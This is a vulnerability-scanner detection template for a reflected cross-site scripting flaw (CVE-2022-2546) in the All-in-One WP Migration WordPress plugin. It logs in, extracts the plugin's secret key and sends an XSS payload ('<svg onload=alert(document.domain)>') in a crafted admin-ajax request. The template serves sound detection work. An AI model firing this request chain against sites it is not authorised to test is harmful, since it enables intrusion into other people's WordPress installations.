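id: CVE-2022-2546

# Detection template for the reflected XSS in the All-in-One WP Migration
# WordPress plugin (versions <= 7.62, per the description below).
# The check is authenticated: {{username}} and {{password}} are not defined
# in this template and must be supplied by the operator at run time.

info:
  name: All-in-One WP Migration plugin - Cross-Site Scripting (XSS)
  author: theamanrawat
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) vulnerability in WordPress All-in-One WP Migration plugin (versions <= 7.62).
  remediation: |
    Update the All-in-One WP Migration plugin to a release newer than 7.62.
  reference:
    - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58
    - https://wordpress.org/plugins/all-in-one-wp-migration/
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2546
  classification:
    cve-id: CVE-2022-2546
    # Cross-site scripting maps to CWE-79.
    cwe-id: CWE-79
  metadata:
    verified: true
  tags: cve,all-in-one-wp-migration,authenticated,wpscan,cve2022,wordpress,wp-plugin,wp,xss

requests:
  - raw:
      # Request 1: log in so that the later requests carry a session cookie.
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      # Request 2: load the plugin's export page.
      # NOTE(review): presumably this is the response the secret_key
      # extractor below matches - confirm against a test instance.
      - |
        GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1
        Host: {{Hostname}}

      # Request 3: send the marker string to the export AJAX action, using the
      # extracted {{secretkey}}; the matchers inspect only this response.
      - |
        GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1
        Host: {{Hostname}}

    # Reuse the login cookie across the three requests.
    cookie-reuse: true
    # Expose per-request variables (the *_3 names) to the DSL matcher.
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - contains(all_headers_3, "text/html")
          - status_code_3 == 200
          # Require the opening tag to come back unencoded right after the
          # marker. Matching on the marker text alone would also flag a
          # response that echoes the value with the markup escaped, which is
          # not exploitable and would be a false positive.
          - contains(body_3, '{\"new_value\":[\"XSSPAYLOAD<svg')
        condition: and

    extractors:
      # internal: true keeps the extracted key out of the scan results; it is
      # only used to fill {{secretkey}} in request 3.
      - type: regex
        name: secretkey
        group: 1
        regex:
          - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
        internal: true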